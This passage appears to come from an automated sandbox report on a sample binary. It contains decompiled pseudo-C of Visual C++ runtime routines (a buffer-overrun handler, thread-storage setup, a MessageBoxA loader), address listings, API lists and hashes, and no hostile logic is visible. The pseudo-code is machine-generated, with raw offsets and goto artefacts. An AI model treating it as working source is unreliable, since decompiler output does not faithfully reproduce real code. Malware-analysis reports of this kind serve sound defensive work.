						if(_t172 == 0 ||  *((intOrPtr*)(_t172 + 0x54)) == 0) {
							goto L17;
						} else {
							_t173 =  *((intOrPtr*)(_t172 + 0x54));
							_t174 =  *((intOrPtr*)( *_t173 + 0x14))(_t173,  *(_t226 + 0xc));
							if(_t174 != 0) {
								goto L17;
							} else {
								_t123 = _t174 + 1;
								goto L54;
							}
						}
					}
				}
			}

















































                                                                              0x004110ac
                                                                              0x004110b4
                                                                              0x004110bc
                                                                              0x004110bf
                                                                              0x004110c9
                                                                              0x004110c1
                                                                              0x004110c1
                                                                              0x004110c1
                                                                              0x004110cc
                                                                              0x004110cf
                                                                              0x004110d2
                                                                              0x004110dc
                                                                              0x004110df
                                                                              0x004110eb
                                                                              0x004110ee
                                                                              0x004110fe
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00411110
                                                                              0x00411110
                                                                              0x00411112
                                                                              0x004111bd
                                                                              0x004111c4
                                                                              0x004111ca
                                                                              0x004111cc
                                                                              0x004111cf
                                                                              0x004111cf
                                                                              0x004111d1
                                                                              0x004111d8
                                                                              0x00411265
                                                                              0x0041126a
                                                                              0x0041126e
                                                                              0x00411271
                                                                              0x004113ad
                                                                              0x004113b0
                                                                              0x00411298
                                                                              0x004112a7
                                                                              0x004112a9
                                                                              0x004112ab
                                                                              0x004112b6
                                                                              0x004112bb
                                                                              0x004112be
                                                                              0x004112c9
                                                                              0x004112ce
                                                                              0x004112be
                                                                              0x004112cf
                                                                              0x004112d8
                                                                              0x004112da
                                                                              0x004112dc
                                                                              0x004112f0
                                                                              0x004112f6
                                                                              0x004112fa
                                                                              0x004112fc
                                                                              0x004112fe
                                                                              0x0041130f
                                                                              0x0041130f
                                                                              0x004112fe
                                                                              0x00411314
                                                                              0x00000000
                                                                              0x00411314
                                                                              0x004113b6
                                                                              0x004113b9
                                                                              0x00411466
                                                                              0x0041146d
                                                                              0x00411471
                                                                              0x00411476
                                                                              0x00411478
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041147e
                                                                              0x00411482
                                                                              0x00411485
                                                                              0x00411487
                                                                              0x00411490
                                                                              0x00411489
                                                                              0x00411489
                                                                              0x00411489
                                                                              0x00411495
                                                                              0x00411497
                                                                              0x00411499
                                                                              0x00000000
                                                                              0x0041149f
                                                                              0x0041149f
                                                                              0x004114a3
                                                                              0x004114a9
                                                                              0x004114a9
                                                                              0x004114ae
                                                                              0x004114b2
                                                                              0x004114c8
                                                                              0x004114ca
                                                                              0x004114cc
                                                                              0x004114df
                                                                              0x004114ce
                                                                              0x004114cf
                                                                              0x004114cf
                                                                              0x004114e4
                                                                              0x004114e6
                                                                              0x004114e8
                                                                              0x00000000
                                                                              0x004114ee
                                                                              0x004114f7
                                                                              0x004114fa
                                                                              0x004114ff
                                                                              0x00411502
                                                                              0x0041150f
                                                                              0x0041150f
                                                                              0x00000000
                                                                              0x00411502
                                                                              0x004114b4
                                                                              0x004114ba
                                                                              0x004114c0
                                                                              0x004114c2
                                                                              0x00000000
                                                                              0x004114c2
                                                                              0x004114b2
                                                                              0x00411499
                                                                              0x004113bf
                                                                              0x004113c2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004113c8
                                                                              0x004113cb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004113d1
                                                                              0x004113d1
                                                                              0x004113d3
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004113dc
                                                                              0x004113e1
                                                                              0x004113e4
                                                                              0x004113f5
                                                                              0x004113e6
                                                                              0x004113e6
                                                                              0x004113eb
                                                                              0x004113eb
                                                                              0x004113fa
                                                                              0x004113fc
                                                                              0x004113fe
                                                                              0x00411401
                                                                              0x0041141c
                                                                              0x0041141e
                                                                              0x00411423
                                                                              0x00411425
                                                                              0x00411433
                                                                              0x00411436
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041143c
                                                                              0x0041143d
                                                                              0x0041143e
                                                                              0x0041143f
                                                                              0x00411441
                                                                              0x00411446
                                                                              0x00411447
                                                                              0x0041144a
                                                                              0x00411452
                                                                              0x00000000
                                                                              0x00411452
                                                                              0x00411428
                                                                              0x00000000
                                                                              0x00411403
                                                                              0x00411407
                                                                              0x00411412
                                                                              0x00411414
                                                                              0x00411416
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00411416
                                                                              0x00411401
                                                                              0x00411277
                                                                              0x00411405
                                                                              0x00411405
                                                                              0x00411405
                                                                              0x00000000
                                                                              0x00411405
                                                                              0x0041127d
                                                                              0x00411280
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00411286
                                                                              0x00411289
                                                                              0x00411327
                                                                              0x00411329
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00411331
                                                                              0x00411337
                                                                              0x0041133c
                                                                              0x0041133f
                                                                              0x00411347
                                                                              0x0041134c
                                                                              0x0041134e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00411354
                                                                              0x00411358
                                                                              0x0041136d
                                                                              0x0041136f
                                                                              0x00411371
                                                                              0x00411381
                                                                              0x00411373
                                                                              0x00411374
                                                                              0x00411374
                                                                              0x00411386
                                                                              0x00411388
                                                                              0x0041138a
                                                                              0x00411393
                                                                              0x00411398
                                                                              0x004113a1
                                                                              0x004113a7
                                                                              0x0041135a
                                                                              0x00411362
                                                                              0x00411362
                                                                              0x00000000
                                                                              0x00411358
                                                                              0x0041128f
                                                                              0x00411292
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00411292
                                                                              0x004111df
                                                                              0x004111df
                                                                              0x004111e0
                                                                              0x0041120c
                                                                              0x00411210
                                                                              0x00411215
                                                                              0x0041121c
                                                                              0x00411222
                                                                              0x00411222
                                                                              0x00411226
                                                                              0x0041122a
                                                                              0x00411230
                                                                              0x00411230
                                                                              0x00411234
                                                                              0x00411244
                                                                              0x00411249
                                                                              0x0041124b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041124d
                                                                              0x00411250
                                                                              0x00411252
                                                                              0x00000000
                                                                              0x00411254
                                                                              0x00411257
                                                                              0x00000000
                                                                              0x00411257
                                                                              0x00411252
                                                                              0x00000000
                                                                              0x00411234
                                                                              0x0041122c
                                                                              0x0041122e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041122e
                                                                              0x0041121e
                                                                              0x00411220
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00411220
                                                                              0x004111e2
                                                                              0x004111e5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004111eb
                                                                              0x004111ee
                                                                              0x00411201
                                                                              0x00411201
                                                                              0x00411206
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00411206
                                                                              0x004111f2
                                                                              0x004111f8
                                                                              0x004111fb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00411118
                                                                              0x00411118
                                                                              0x00411121
                                                                              0x00411142
                                                                              0x00411146
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00411146
                                                                              0x0041114a
                                                                              0x0041116f
                                                                              0x0041116f
                                                                              0x00411176
                                                                              0x00411186
                                                                              0x00411186
                                                                              0x00411188
                                                                              0x004111ba
                                                                              0x004111ba
                                                                              0x00000000
                                                                              0x004111ba
                                                                              0x0041118a
                                                                              0x0041118d
                                                                              0x0041118f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00411194
                                                                              0x00411198
                                                                              0x0041119c
                                                                              0x004111ab
                                                                              0x004111ab
                                                                              0x004111af
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004111b1
                                                                              0x004111b8
                                                                              0x00411236
                                                                              0x00411236
                                                                              0x00411316
                                                                              0x0041131b
                                                                              0x00411324
                                                                              0x00411324
                                                                              0x00000000
                                                                              0x004111b8
                                                                              0x0041119e
                                                                              0x004111a5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004111a5
                                                                              0x00411178
                                                                              0x0041117b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041117d
                                                                              0x00411184
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00411184
                                                                              0x0041114c
                                                                              0x00411151
                                                                              0x00000000
                                                                              0x00411159
                                                                              0x00411159
                                                                              0x00411162
                                                                              0x00411167
                                                                              0x00000000
                                                                              0x00411169
                                                                              0x00411169
                                                                              0x00000000
                                                                              0x00411169
                                                                              0x00411167
                                                                              0x00411151
                                                                              0x00411112

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Focus$Message$ParentStateWindow$BeepDialogH_prologItemNextSend
                                                                              • String ID:
                                                                              • API String ID: 2999224188-0
                                                                              • Opcode ID: 81c8557fcc62b657759318c9e8e1294be6d82bdbd298a3b48f508cb4dec36334
                                                                              • Instruction ID: a10af213f865ed3091a5aaea9adb8c43c50ec6b0559451cfc79d8e8de6ad41fe
                                                                              • Opcode Fuzzy Hash: 81c8557fcc62b657759318c9e8e1294be6d82bdbd298a3b48f508cb4dec36334
                                                                              • Instruction Fuzzy Hash: 09C1DE3090022AABDF20AB65D944BFFBBB5AF44754F14412BEA01A7271CB7C9CC1CA5D
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00418586, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 97COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 59%
                                                                              			E00418586(void* __ebx, signed char** __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t22;
				intOrPtr* _t23;
				void* _t31;
				void* _t58;
				signed char* _t60;
				signed char** _t66;
				char* _t68;
				void* _t70;
				intOrPtr _t71;
				void* _t72;
				intOrPtr _t73;

				_t67 = __edi;
				_t66 = __edx;
				_t54 = __ebx;
				_push(0x118);
				_push(0x44c628);
				E00412BA4(__ebx, __edi, __esi);
				_t22 =  *0x457184; // 0xc72e1596
				 *((intOrPtr*)(_t72 - 0x1c)) = _t22;
				_t23 =  *0x45a724; // 0x0
				if(_t23 == 0) {
					if( *((intOrPtr*)(_t72 + 8)) == 1) {
						_t68 = "Buffer overrun detected!";
						 *(_t72 - 0x128) = "A buffer overrun has been detected which has corrupted the program\'s\ninternal state.  The program cannot safely continue execution and must\nnow be terminated.\n";
						_t70 = 0xb9;
					} else {
						_t68 = "Unknown security failure detected!";
						 *(_t72 - 0x128) = "A security error of unknown cause has been detected which has\ncorrupted the program\'s internal state.  The program cannot safely\ncontinue execution and must now be terminated.\n";
						_t70 = 0xd4;
					}
					 *((char*)(_t72 - 0x20)) = 0;
					if(GetModuleFileNameA(0, _t72 - 0x124, 0x104) == 0) {
						E00419460(_t72 - 0x124, "<program name unknown>");
					}
					_t54 = _t72 - 0x124;
					if(E00411A30(_t72 - 0x124) + 0xb > 0x3c) {
						E0041ADB0(E00411A30(_t54) + _t72 - 0xf3, "...", 3);
						_t73 = _t73 + 0x10;
					}
					_t31 = E00411A30(_t54);
					_pop(_t58);
					E00412260(_t31 + _t70 + 0x0000000c + 0x00000003 & 0xfffffffc, _t58);
					 *((intOrPtr*)(_t72 - 0x18)) = _t73;
					_t71 = _t73;
					E00419460(_t71, _t68);
					_t67 = "\n\n";
					E00419470(_t71, "\n\n");
					E00419470(_t71, "Program: ");
					E00419470(_t71, _t54);
					E00419470(_t71, "\n\n");
					E00419470(_t71,  *(_t72 - 0x128));
					_push(0x12010);
					_push("Microsoft Visual C++ Runtime Library");
					_push(_t71);
					E0041C6F5();
				} else {
					 *(_t72 - 4) = 0;
					 *_t23( *((intOrPtr*)(_t72 + 8)),  *((intOrPtr*)(_t72 + 0xc)));
					 *(_t72 - 4) =  *(_t72 - 4) | 0xffffffff;
				}
				E00413195(3);
				asm("int3");
				_t19 =  &(_t66[1]);
				 *_t19 = _t66[1] - 1;
				if( *_t19 < 0) {
					return E0041CE26(_t54, _t67, _t72, _t66);
				} else {
					_t60 =  *_t66;
					 *_t66 =  &(_t60[1]);
					return  *_t60 & 0x000000ff;
				}
			}














                                                                              0x00418586
                                                                              0x00418586
                                                                              0x00418586
                                                                              0x00418586
                                                                              0x0041858b
                                                                              0x00418590
                                                                              0x00418595
                                                                              0x0041859a
                                                                              0x0041859d
                                                                              0x004185a6
                                                                              0x004185cb
                                                                              0x004185e3
                                                                              0x004185e8
                                                                              0x004185f2
                                                                              0x004185cd
                                                                              0x004185cd
                                                                              0x004185d2
                                                                              0x004185dc
                                                                              0x004185dc
                                                                              0x004185f7
                                                                              0x0041860f
                                                                              0x0041861d
                                                                              0x00418623
                                                                              0x00418624
                                                                              0x00418639
                                                                              0x00418658
                                                                              0x0041865d
                                                                              0x0041865d
                                                                              0x00418661
                                                                              0x00418666
                                                                              0x00418671
                                                                              0x00418676
                                                                              0x00418679
                                                                              0x0041867d
                                                                              0x00418682
                                                                              0x00418689
                                                                              0x00418694
                                                                              0x0041869b
                                                                              0x004186a2
                                                                              0x004186ae
                                                                              0x004186b3
                                                                              0x004186b8
                                                                              0x004186bd
                                                                              0x004186be
                                                                              0x004185a8
                                                                              0x004185a8
                                                                              0x004185b1
                                                                              0x004185b5
                                                                              0x004185b5
                                                                              0x004186c8
                                                                              0x004186cd
                                                                              0x004186ce
                                                                              0x004186ce
                                                                              0x004186d1
                                                                              0x004186e3
                                                                              0x004186d3
                                                                              0x004186d3
                                                                              0x004186d9
                                                                              0x004186db
                                                                              0x004186db

                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0044C628,00000118,00412FA3,00000001,00000000,0044BC78,00000008,004172FD,00000000,00000000,00000000), ref: 00418607
                                                                              • _strcat.LIBCMT ref: 0041861D
                                                                              • _strlen.LIBCMT ref: 0041862D
                                                                              • _strlen.LIBCMT ref: 0041863E
                                                                              • _strncpy.LIBCMT ref: 00418658
                                                                              • _strlen.LIBCMT ref: 00418661
                                                                              • _strcat.LIBCMT ref: 0041867D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: _strlen$_strcat$FileModuleName_strncpy
                                                                              • String ID: ...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
                                                                              • API String ID: 3058806289-1673886896
                                                                              • Opcode ID: f28d508e9363690382514489229ac515cc01931938026898d4428815b295fd00
                                                                              • Instruction ID: 4b3dee8e0c2eeeff519a025442f79e7c162428ee7880824445fbee59176d29a9
                                                                              • Opcode Fuzzy Hash: f28d508e9363690382514489229ac515cc01931938026898d4428815b295fd00
                                                                              • Instruction Fuzzy Hash: E931F472A462187BDB10AB718D82FDE37A89F04318F14405FF404A6282DB7CDED18B9D
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041640C, Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 71libraryloadermemoryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 70%
                                                                              			E0041640C() {
				void* __edi;
				void* __esi;
				intOrPtr _t7;
				struct HINSTANCE__* _t9;
				struct HINSTANCE__* _t11;
				long _t12;
				_Unknown_base(*)()* _t16;
				void* _t22;
				struct HINSTANCE__* _t26;
				void* _t30;
				struct HINSTANCE__* _t32;

				if(E004147A5() != 0) {
					_push(_t30);
					_t26 = GetModuleHandleA("kernel32.dll");
					__eflags = _t26;
					if(_t26 != 0) {
						_t30 = GetProcAddress;
						 *0x45a5b0 = GetProcAddress(_t26, "FlsAlloc");
						 *0x45a5b4 = GetProcAddress(_t26, "FlsGetValue");
						 *0x45a5b8 = GetProcAddress(_t26, "FlsSetValue");
						_t16 = GetProcAddress(_t26, "FlsFree");
						__eflags =  *0x45a5b4;
						 *0x45a5bc = _t16;
						if( *0x45a5b4 == 0) {
							 *0x45a5b4 = TlsGetValue;
							 *0x45a5b8 = TlsSetValue;
							 *0x45a5b0 = E0041622E;
							 *0x45a5bc = TlsFree;
						}
					}
					_t7 =  *0x45a5b0(E004162C5);
					__eflags = _t7 - 0xffffffff;
					 *0x457710 = _t7;
					if(__eflags == 0) {
						L9:
						E00416237();
						_t9 = 0;
						__eflags = 0;
					} else {
						_push(0x8c);
						_push(1);
						_t32 = E004146EA(_t22, 1, _t30, __eflags);
						__eflags = _t32;
						if(_t32 == 0) {
							goto L9;
						} else {
							_t11 =  *0x45a5b8( *0x457710, _t32);
							__eflags = _t11;
							if(_t11 == 0) {
								goto L9;
							} else {
								 *((intOrPtr*)(_t32 + 0x54)) = 0x4577b8;
								 *((intOrPtr*)(_t32 + 0x14)) = 1;
								_t12 = GetCurrentThreadId();
								 *(_t32 + 4) =  *(_t32 + 4) | 0xffffffff;
								 *_t32 = _t12;
								_t9 = 1;
							}
						}
					}
					return _t9;
				} else {
					E00416237();
					return 0;
				}
			}














                                                                              0x00416413
                                                                              0x0041641d
                                                                              0x0041642a
                                                                              0x0041642c
                                                                              0x0041642e
                                                                              0x00416430
                                                                              0x00416444
                                                                              0x00416451
                                                                              0x0041645e
                                                                              0x00416463
                                                                              0x00416465
                                                                              0x0041646c
                                                                              0x00416471
                                                                              0x00416478
                                                                              0x00416482
                                                                              0x0041648c
                                                                              0x00416496
                                                                              0x00416496
                                                                              0x00416471
                                                                              0x004164a0
                                                                              0x004164a6
                                                                              0x004164a9
                                                                              0x004164ae
                                                                              0x004164f1
                                                                              0x004164f1
                                                                              0x004164f6
                                                                              0x004164f6
                                                                              0x004164b0
                                                                              0x004164b2
                                                                              0x004164b8
                                                                              0x004164be
                                                                              0x004164c0
                                                                              0x004164c4
                                                                              0x00000000
                                                                              0x004164c6
                                                                              0x004164cd
                                                                              0x004164d3
                                                                              0x004164d5
                                                                              0x00000000
                                                                              0x004164d7
                                                                              0x004164d7
                                                                              0x004164de
                                                                              0x004164e1
                                                                              0x004164e7
                                                                              0x004164eb
                                                                              0x004164ed
                                                                              0x004164ed
                                                                              0x004164d5
                                                                              0x004164c4
                                                                              0x004164fa
                                                                              0x00416415
                                                                              0x00416415
                                                                              0x0041641c
                                                                              0x0041641c

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,74B04DE0,00000000,00412E3E,?,0044BC68,00000060), ref: 00416424
                                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0041643C
                                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00416449
                                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00416456
                                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00416463
                                                                              • FlsAlloc.KERNEL32(004162C5,?,0044BC68,00000060), ref: 004164A0
                                                                              • FlsSetValue.KERNEL32(00000000,?,0044BC68,00000060), ref: 004164CD
                                                                              • GetCurrentThreadId.KERNEL32 ref: 004164E1
                                                                                • Part of subcall function 00416237: FlsFree.KERNEL32(00000006,004164F6,?,0044BC68,00000060), ref: 00416242
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$AllocCurrentFreeHandleModuleThreadValue
                                                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$kernel32.dll
                                                                              • API String ID: 2355849793-282957996
                                                                              • Opcode ID: 9e510d61cc21bddcd4574fa6883e21f2e445ab6703d7604ce7355308ef32ae10
                                                                              • Instruction ID: 67e5d30d09829f2954eda8bc3cfda7784ab9eb3bde95fd9faf2e06f326351d81
                                                                              • Opcode Fuzzy Hash: 9e510d61cc21bddcd4574fa6883e21f2e445ab6703d7604ce7355308ef32ae10
                                                                              • Instruction Fuzzy Hash: 60217C70504718AA9B20AF29BD49A573FF0EB85753311067FF416C22A1EBB8D488CF5E
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041C6F5, Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 90libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 29%
                                                                              			E0041C6F5(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a14) {
				char _v8;
				signed char _v12;
				char _v20;
				intOrPtr* _t13;
				intOrPtr* _t14;
				intOrPtr* _t17;
				void* _t19;
				_Unknown_base(*)()* _t23;
				_Unknown_base(*)()* _t26;
				void* _t28;
				struct HINSTANCE__* _t31;
				void* _t33;

				_t28 = 0;
				_t33 =  *0x45a888 - _t28; // 0x0
				if(_t33 != 0) {
					L6:
					_t13 =  *0x45a894; // 0x0
					if(_t13 == 0) {
						L14:
						_t14 =  *0x45a88c; // 0x0
						if(_t14 != 0) {
							_t28 =  *_t14();
							if(_t28 != 0) {
								_t17 =  *0x45a890; // 0x0
								if(_t17 != 0) {
									_t28 =  *_t17(_t28);
								}
							}
						}
						L18:
						return  *0x45a888(_t28, _a4, _a8, _a12);
					}
					_t19 =  *_t13();
					if(_t19 == 0) {
						L10:
						if( *0x45a3fc < 4) {
							_a14 = _a14 | 0x00000004;
						} else {
							_a14 = _a14 | 0x00000020;
						}
						goto L18;
					}
					_push( &_v8);
					_push(0xc);
					_push( &_v20);
					_push(1);
					_push(_t19);
					if( *0x45a898() == 0 || (_v12 & 0x00000001) == 0) {
						goto L10;
					} else {
						goto L14;
					}
				}
				_t31 = LoadLibraryA("user32.dll");
				if(_t31 == 0) {
					L12:
					return 0;
				}
				_t23 = GetProcAddress(_t31, "MessageBoxA");
				 *0x45a888 = _t23;
				if(_t23 == 0) {
					goto L12;
				} else {
					 *0x45a88c = GetProcAddress(_t31, "GetActiveWindow");
					 *0x45a890 = GetProcAddress(_t31, "GetLastActivePopup");
					if( *0x45a3f0 == 2) {
						_t26 = GetProcAddress(_t31, "GetUserObjectInformationA");
						 *0x45a898 = _t26;
						if(_t26 != 0) {
							 *0x45a894 = GetProcAddress(_t31, "GetProcessWindowStation");
						}
					}
					goto L6;
				}
			}















                                                                              0x0041c6fc
                                                                              0x0041c6fe
                                                                              0x0041c706
                                                                              0x0041c775
                                                                              0x0041c775
                                                                              0x0041c77c
                                                                              0x0041c7ba
                                                                              0x0041c7ba
                                                                              0x0041c7c1
                                                                              0x0041c7c5
                                                                              0x0041c7c9
                                                                              0x0041c7cb
                                                                              0x0041c7d2
                                                                              0x0041c7d7
                                                                              0x0041c7d7
                                                                              0x0041c7d2
                                                                              0x0041c7c9
                                                                              0x0041c7d9
                                                                              0x00000000
                                                                              0x0041c7e3
                                                                              0x0041c77e
                                                                              0x0041c782
                                                                              0x0041c7a1
                                                                              0x0041c7a8
                                                                              0x0041c7b4
                                                                              0x0041c7aa
                                                                              0x0041c7aa
                                                                              0x0041c7aa
                                                                              0x00000000
                                                                              0x0041c7a8
                                                                              0x0041c787
                                                                              0x0041c788
                                                                              0x0041c78d
                                                                              0x0041c78e
                                                                              0x0041c790
                                                                              0x0041c799
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041c799
                                                                              0x0041c713
                                                                              0x0041c717
                                                                              0x0041c7b0
                                                                              0x00000000
                                                                              0x0041c7b0
                                                                              0x0041c729
                                                                              0x0041c72d
                                                                              0x0041c732
                                                                              0x00000000
                                                                              0x0041c734
                                                                              0x0041c742
                                                                              0x0041c750
                                                                              0x0041c755
                                                                              0x0041c75d
                                                                              0x0041c761
                                                                              0x0041c766
                                                                              0x0041c770
                                                                              0x0041c770
                                                                              0x0041c766
                                                                              0x00000000
                                                                              0x0041c755

                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(user32.dll,0044C3B0,?,?), ref: 0041C70D
                                                                              • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0041C729
                                                                              • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0041C73A
                                                                              • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0041C747
                                                                              • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 0041C75D
                                                                              • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0041C76E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoad
                                                                              • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$user32.dll
                                                                              • API String ID: 2238633743-1612076079
                                                                              • Opcode ID: 4be51c41bfa88825c9eef02e0fc808f0e31b0e6baba86614993bf8dfa1398cb3
                                                                              • Instruction ID: ccfaab82150faac271222fce0a4fbcbc68ab76b021f251c2d7e6e2ab04d4bf56
                                                                              • Opcode Fuzzy Hash: 4be51c41bfa88825c9eef02e0fc808f0e31b0e6baba86614993bf8dfa1398cb3
                                                                              • Instruction Fuzzy Hash: E421B430680347AAEB01AFB59CC5BBB3BE9DB04781B14053BA515C2291EBF8D4919E5E
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042FCB6, Relevance: 19.9, APIs: 13, Instructions: 395stringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 48%
                                                                              			E0042FCB6(intOrPtr __ecx) {
				signed int __ebx;
				signed int __edi;
				CHAR* __esi;
				signed int _t161;
				signed int _t164;
				intOrPtr* _t170;
				signed int _t172;
				signed int _t174;
				signed int _t178;
				void* _t192;
				signed short _t203;
				signed int _t204;
				signed int _t205;
				signed int* _t207;
				signed int _t209;
				void* _t213;
				signed int _t214;
				signed int _t217;
				signed short* _t224;
				void* _t233;
				CHAR* _t235;
				signed int _t236;
				intOrPtr* _t237;
				void* _t238;
				void* _t239;
				signed short _t242;
				signed int _t243;
				intOrPtr _t244;
				signed short* _t245;
				signed int** _t246;
				void* _t247;
				void* _t249;
				void* _t250;
				void* _t253;
				void* _t263;

				E004128A0(E004314A3, _t247);
				_t250 = _t249 - 0x60;
				 *((intOrPtr*)(_t247 - 0x28)) = __ecx;
				_t161 =  *0x4560dc(_t233, _t239, _t213);
				_t214 = 0;
				 *(_t247 - 0x20) = _t161;
				if( *((intOrPtr*)(__ecx)) != 0) {
					E00412140(_t247 - 0x4c, 0, 0x10);
					_t235 =  *(_t247 + 0x18);
					_t253 = _t250 + 0xc;
					if(_t235 == 0) {
						_t164 =  *(_t247 - 0x44);
					} else {
						_t164 = lstrlenA(_t235);
						 *(_t247 - 0x44) = _t164;
					}
					 *((intOrPtr*)(_t247 - 0x1c)) = 0xfffffffd;
					if(( *(_t247 + 0xc) & 0x0000000c) != 0) {
						 *((intOrPtr*)(_t247 - 0x40)) = 1;
						 *((intOrPtr*)(_t247 - 0x48)) = _t247 - 0x1c;
					}
					if(_t164 != _t214) {
						_t244 = E00424440(_t164 << 4);
						 *((intOrPtr*)(_t247 - 0x4c)) = _t244;
						E00412140(_t244, _t214,  *(_t247 - 0x44) << 4);
						_t253 = _t253 + 0x10;
						_t245 = _t244 + ( *(_t247 - 0x44) << 4) - 0x10;
						 *(_t247 - 0x14) = _t235;
						 *(_t247 - 0x10) = _t245;
						if( *_t235 != 0) {
